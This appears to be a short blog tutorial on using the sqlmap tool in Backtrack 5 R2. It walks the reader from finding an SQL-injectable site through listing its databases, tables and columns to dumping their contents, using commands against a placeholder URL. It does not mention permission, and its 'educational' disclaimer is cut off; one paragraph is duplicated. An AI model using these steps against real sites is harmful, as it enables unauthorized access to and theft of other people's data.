day i'm gonna tell you how to use Sqlmap in Backtrack 5 R2.
In this tutorial i'll only tell you the basic usage of Sqlmap.
Before we begin, I assume that, those users who are reading this article, knows how to find sql vulnerable sites.If you are new to it, we have a separate SQL Injection Blog, please Do Visit :- www.sqlihack.blogspot.com.
So now lets begin:-
Before we begin, I assume that, those users who are reading this article, knows how to find sql vulnerable sites.If you are new to it, we have a separate SQL Injection Blog, please Do Visit :- www.sqlihack.blogspot.com.
So now lets begin:-
- First find a sql vulnerable site.
- Then open your sqlmap. This would look something like this:
- To find the databases,type python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 --dbs
- -u is used to denote the url
- --dbs is used to find database of the site
- Then hit Enter Button. This would look something like this
- Then if the site is vulnerable, this will show the database of the website.
- To find the current database type python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 --current-db .Then hit Enter.
- --current-db this is used to find current database used by the site.
- After that, to find the tables of a database, type python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 -D database_name --tables
- -D is used for taking a specific database.
- --tables is used for find the tables of a specific database. See the image
- This will shows all the tables of a database.
- Then, to find columns of a particular table, type python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 -D database_name -T table_name --columns
- -T is used for taking a specific table
- --columns is used for finding columns
- Now we have come to final steps, till now we have found database, tables, and columns. This time we dump columns.
- To dump columns, type python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 -D database_name -T table_name -C column_name --dump
- -C is used for taking a specific column or columns. You can dump one columns or more than one columns by putting comma like this:- -C column_name1, column_name2, column_name3 etc.
- --dump is used for dumping column or columns at a time. You will understand this by seeing the image
- Now you have successfully done !!
This is only for educ
Post a Comment